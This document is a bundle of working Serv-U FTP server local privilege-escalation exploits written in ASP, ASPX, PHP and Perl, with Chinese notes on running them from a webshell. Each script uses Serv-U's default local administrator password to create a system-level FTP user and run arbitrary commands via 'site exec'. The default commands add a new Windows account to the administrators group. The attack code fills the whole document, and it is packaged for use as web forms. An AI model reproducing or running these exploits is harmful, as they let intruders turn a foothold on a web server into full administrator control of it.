ASP
<%
'Serv-U asp 提权程序
'author: Goldsun[at]84823714
'DO NOT use it to do evil things!
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request("action")
if not isnumeric(action) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",f)
select case action
case 1
set a=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "
http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
set session("a")=a
%>
<form method="post" name="goldsun">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="2"></form>
<script language="javascript">
document.write('<center>正在连接 127.0.0.1:<%=port%>,使用用户名: <%=user%>,口令:<%=pass%>...<center>');
setTimeout("document.all.goldsun.submit();",4000);
</script>
<%
case 2
set b=Server.CreateObject("Microsoft.XMLHTTP")
b.open "GET", "
http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
set session("b")=b
%>
<form method="post" name="goldsun">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="3"></form>
<script language="javascript">
document.write('<center>正在提升权限,请等待...,<center>');
setTimeout("document.all.goldsun.submit();",4000);
</script>
<%
case 3
set c=Server.CreateObject("Microsoft.XMLHTTP")
c.open "GET", "
http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
c.send loginuser & loginpass & mt & deldomain & quit
set session("c")=c
%>
<center>提权完毕,已执行了命令:<br><font color=red><%=cmd%></font><br><br>
<input type=button value=" 返回继续 " onClick="location.href='<%=gname()%>';">
</center>
<%
case else
on error resume next
set a=session("a")
set b=session("b")
set c=session("c")
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
%>
<center><form method="post" name="goldsun">
<table width="494" height="163" border="1" cellpadding="0" cellspacing="1" bordercolor="#666666">
<tr align="center" valign="middle">
<td colspan="2">Serv-U 提升权限 ASP版 Goldsun[at]84823714</td>
</tr>
<tr align="center" valign="middle">
<td width="100">用户名:</td>
<td width="379"><input name="u" type="text" id="u" value="LocalAdministrator"></td>
</tr>
<tr align="center" valign="middle">
<td>口 令:</td>
<td><input name="p" type="text" id="p" value="
#l@$ak#.lk;0@P"></td>
</tr>
<tr align="center" valign="middle">
<td>端 口:</td>
<td><input name="port" type="text" id="port" value="43958"></td>
</tr>
<tr align="center" valign="middle">
<td>系统路径:</td>
<td><input name="f" type="text" id="f" value="<%=f%>" size="8"></td>
</tr>
<tr align="center" valign="middle">
<td>命 令:</td>
<td><input name="c" type="text" id="c" value="cmd /c net user goldsun love /add & net localgroup administrators goldsun /add" size="50"></td>
</tr>
<tr align="center" valign="middle">
<td colspan="2"><input type="submit" name="Submit" value="提交">
<input type="reset" name="Submit2" value="重置">
<input name="action" type="hidden" id="action" value="1"></td>
</tr>
</table></form></center>
<% end select
function Gpath()
on error resume next
err.clear
set f=Server.CreateObject("Scripting.FileSystemObject")
if err.number>0 then
gpath="c:"
exit function
end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
Function GName()
If request.servervariables("SERVER_PORT")="80" Then
GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name"))
Else
GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name"))
End If
End Function
%>
ASPX<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="System.Net.Sockets" %>
<script runat="server">
'
' Love, where are you ?
Sub BTN_Start_Click(sender As Object, e As EventArgs)
Dim Usr As String = Text_Name.Text
Dim pwd As String = Text_PWD.Text
Dim Port As Int32 = Text_Port.Text
Dim Command As String = Text_cmd.Text
Dim LoginUser As String = "User " & Usr & vbcrlf
Dim LoginPass As String = "Pass " & pwd & vbcrlf
Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
Dim DelDomain As String = "-deleteDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf
Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
"-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
Dim Quit As String = "QUIT" & vbcrlf
Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf
'Dim client As New TcpClient
Dim tcpClient As New TcpClient()
Try
tcpClient.Connect("127.0.0.1", port)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient.ReceiveBufferSize = 1024
Dim networkStream As NetworkStream = tcpClient.GetStream()
Rec(networkStream)
Send(networkStream, LoginUser)
Rec(networkStream)
Send(networkStream, LoginPass)
Rec(networkStream)
Send(networkStream, MAINTENANCE)
Rec(networkStream)
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, NewDomain)
Rec(networkStream)
Send(networkStream, NewUser)
Rec(networkStream)
Dim tcpClient2 As New TcpClient()
Try
tcpClient2.Connect("127.0.0.1", 43859)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient2.ReceiveBufferSize = 1024
Dim networkStream2 As NetworkStream = tcpClient2.GetStream()
Rec(networkStream2)
Send(networkStream2, "User lake" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "pass admin123" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "site exec " & Command & vbcrlf)
Rec(networkStream2)
tcpClient2.Close()
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, Quit)
Rec(networkStream)
tcpClient.Close()
End Sub
Sub Rec(o As Object)
If o.CanRead Then
Dim bytes(1024) As Byte
o.Read(bytes, 0, 1024)
Dim returndata As String = Encoding.ASCII.GetString(bytes)
response.Write("out:" & returndata & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub
Sub Send(o As Object,data As String)
If o.CanWrite Then
Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)
o.Write(sendBytes, 0, sendBytes.Length)
response.write("in: " & data & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub
</script>
<html>
<head>
</head>
<body>
<form runat="server">
<p>
<asp:Label id="Label1" runat="server" width="353px" forecolor="Blue">from Serv-U 2
admin by lake2</asp:Label>
</p>
<p>
<asp:Label id="Label2" runat="server" width="40px">Name</asp:Label>
<asp:TextBox id="Text_Name" runat="server" Width="152px">LocalAdministrator</asp:TextBox>
<br />
<asp:Label id="Label3" runat="server" width="40px">PWD</asp:Label>
<asp:TextBox id="Text_PWD" runat="server">#l@$ak#.lk;0@P</asp:TextBox>
<br />
<asp:Label id="Label4" runat="server" width="40px">Port</asp:Label>
<asp:TextBox id="Text_Port" runat="server">43958</asp:TextBox>
<br />
<asp:Label id="Label5" runat="server" width="40px">cmd</asp:Label>
<asp:TextBox id="Text_cmd" runat="server"></asp:TextBox>
</p>
<p>
<asp:Button id="BTN_Start" onclick="BTN_Start_Click" runat="server" Text="Start"></asp:Button>
</p>
<p>
<hr />
<!-- insert content here -->
</p>
</form>
</body>
</html>
PHP<?php
if(isset($_POST["Port"])&&isset($_POST["User"])&&isset($_POST["Pass"]))
{
$sendbuf = "";
$recvbuf = "";
$domain = "-SETDOMAIN\r\n".
"-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n".
"-TZOEnable=0\r\n".
" TZOKey=\r\n";
$adduser = "-SETUSERSETUP\r\n".
"-IP=0.0.0.0\r\n".
"-PortNo=2121\r\n".
"-User=Will_Be\r\n".
"-Password=Will_Be\r\n".
"-HomeDir=c:\\\r\n".
"-LoginMesFile=\r\n".
"-Disable=0\r\n".
"-RelPaths=1\r\n".
"-NeedSecure=0\r\n".
"-HideHidden=0\r\n".
"-AlwaysAllowLogin=0\r\n".
"-ChangePassword=0\r\n".
"-QuotaEnable=0\r\n".
"-MaxUsersLoginPerIP=-1\r\n".
"-SpeedLimitUp=0\r\n".
"-SpeedLimitDown=0\r\n".
"-MaxNrUsers=-1\r\n".
"-IdleTimeOut=600\r\n".
"-SessionTimeOut=-1\r\n".
"-Expire=0\r\n".
"-RatioUp=1\r\n".
"-RatioDown=1\r\n".
"-RatiosCredit=0\r\n".
"-QuotaCurrent=0\r\n".
"-QuotaMaximum=0\r\n".
"-Maintenance=None\r\n".
"-PasswordType=Regular\r\n".
"-Ratios=None\r\n".
" Access=c:\\|RELP\r\n";
$deldomain="-DELETEDOMAIN\r\n".
"-IP=0.0.0.0\r\n".
" PortNo=2121\r\n";
$sock = fsockopen("127.0.0.1", $_POST["Port"], &$errno, &$errstr, 10);
$recvbuf = fgets($sock, 1024);
echo "<font color=red>Recv: $recvbuf</font><br>";
$sendbuf = "USER ".$_POST["User"]."\r\n";
fputs($sock, $sendbuf, strlen($sendbuf));
echo "<font color=blue>Send: $sendbuf</font><br>";
$recvbuf = fgets($sock, 1024);
echo "<font color=red>Recv: $recvbuf</font><br>";
$sendbuf = "PASS ".$_POST["Pass"]."\r\n";
fputs($sock, $sendbuf, strlen($sendbuf));
echo "<font color=blue>Send: $sendbuf</font><br>";
$recvbuf = fgets($sock, 1024);
echo "<font color=red>Recv: $recvbuf</font><br>";
$sendbuf = "SITE MAINTENANCE\r\n";
fputs($sock, $sendbuf, strlen($sendbuf));
echo "<font color=blue>Send: $sendbuf</font><br>";
$recvbuf = fgets($sock, 1024);
echo "<font color=red>Recv: $recvbuf</font><br>";
$sendbuf = $domain;
fputs($sock, $sendbuf, strlen($sendbuf));
echo "<font color=blue>Send: $sendbuf</font><br>";
$recvbuf = fgets($sock, 1024);
echo "<font color=red>Recv: $recvbuf</font><br>";
$sendbuf = $adduser;
fputs($sock, $sendbuf, strlen($sendbuf));
echo "<font color=blue>Send: $sendbuf</font><br>";
$recvbuf = fgets($sock, 1024);
echo "<font color=red>Recv: $recvbuf</font><br>";
echo "**********************************************************<br>";
echo "Starting Exploit ...<br>";
echo "**********************************************************<br>";
$exp = fsockopen("127.0.0.1", "2121", &$errno, &$errstr, 10);
$recvbuf = fgets($exp, 1024);
echo "<font color=red>Recv: $recvbuf</font><br>";
$sendbuf = "USER Will_Be\r\n";
fputs($exp, $sendbuf, strlen($sendbuf));
echo "<font color=blue>Send: $sendbuf</font><br>";
$recvbuf = fgets($exp, 1024);
echo "<font color=red>Recv: $recvbuf</font><br>";
$sendbuf = "PASS Will_Be\r\n";
fputs($exp, $sendbuf, strlen($sendbuf));
echo "<font color=blue>Send: $sendbuf</font><br>";
$recvbuf = fgets($exp, 1024);
echo "<font color=red>Recv: $recvbuf</font><br>";
$sendbuf = "site exec ".$_POST["Command"]."\r\n";
fputs($exp, $sendbuf, strlen($sendbuf));
echo "<font color=blue>Send: site exec</font> <font color=green>".$_POST["Command"]."</font><br>";
$recvbuf = fgets($exp, 1024);
echo "<font color=red>Recv: $recvbuf</font><br>";
echo "**********************************************************<br>";
echo "Starting Delete Domain ...<br>";
echo "**********************************************************<br>";
$sendbuf = $deldomain;
fputs($sock, $sendbuf, strlen($sendbuf));
echo "<font color=blue>Send: $sendbuf</font><br>";
$recvbuf = fgets($sock, 1024);
echo "<font color=red>Recv: $recvbuf</font><br>";
fclose($sock);
fclose($exp);
}
?>
<html>
<head>
<meta http-equiv="Content-Type" c>
<title>Serv-U Local Exploit By Will_Be</title>
</head>
<body>
<form method="post">
LocalPort:
<input name="Port" type="text" id="Port" value="43958">
<br>
LocalUser:
<input name="User" type="text" id="User" value="LocalAdministrator">
<br>
LocalPass:
<input name="Pass" type="text" id="Pass" value="#l@$ak#.lk;0@P">
<br>
Command :
<input name="Command" type="text" id="Command" value="net user Will_Be heihei /add">
<br>
<input type="submit" name="Submit" value="提交">
<input type="reset" name="Submit" value="重置">
</form>
</body>
</html>
PerlPerl的默认安装路径是:C:\Perl
然后使用:
perl 你的pl文件的路径。
在WEBSHELL中的路径是这样的:
C:\perl\bin\perl 你的pl文件的路径
#!/usr/bin/perl
use IO::Socket;
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$addr = "127.0.0.1";
$ftpport = 21;
$adminport = 43958;
$adminuser = "LocalAdministrator";
$adminpass = '#l@$ak#.lk;0@P';
$user = "h4x0r";
$password = "123456";
$homedir = 'C:\\';
$dir = 'C:\\WINNT\\System32\\';
use IO::Socket::INET;
$sock = IO::Socket::INET->new("127.0.0.1:$adminport") || die "fail";
print "TEST<br><br>";
print $sock "USER $adminuser\r\n";
sleep (1);
print $sock "PASS $adminpass\r\n";
sleep(1);
print $sock "SITE MAINTENANCE\r\n";
sleep(1);
print $sock "-SETUSERSETUP\r\n";
print $sock "-IP=".$addr."\r\n";
print $sock "-PortNo=".$ftpport."\r\n";
print $sock "-User=".$user."\r\n";
print $sock "-Password=".$password."\r\n";
print $sock "-HomeDir=".$homedir."\r\n";
print $sock "-LoginMesFile=\r\n";
print $sock "-Disable=0\r\n";
print $sock "-RelPaths=0\r\n";
print $sock "-NeedSecure=0\r\n";
print $sock "-HideHidden=0\r\n";
print $sock "-AlwaysAllowLogin=0\r\n";
print $sock "-ChangePassword=1\r\n";
print $sock "-QuotaEnable=0\r\n";
print $sock "-MaxUsersLoginPerIP=-1\r\n";
print $sock "-SpeedLimitUp=-1\r\n";
print $sock "-SpeedLimitDown=-1\r\n";
print $sock "-MaxNrUsers=-1\r\n";
print $sock "-IdleTimeOut=600\r\n";
print $sock "-SessionTimeOut=-1\r\n";
print $sock "-Expire=0\r\n";
print $sock "-RatioUp=1\r\n";
print $sock "-RatioDown=1\r\n";
print $sock "-RatiosCredit=0\r\n";
print $sock "-QuotaCurrent=0\r\n";
print $sock "-QuotaMaximum=0\r\n";
print $sock "-Maintenance=System\r\n";
print $sock "-PasswordType=Regular\r\n";
print $sock "-Ratios=None\r\n";
print $sock " Access=".$homedir."|RWAMELCDP\r\n";
print $sock "QUIT\r\n";
@ret=<$sock>;
print "@ret";
close(STDERR);
close(STDOUT);
exit;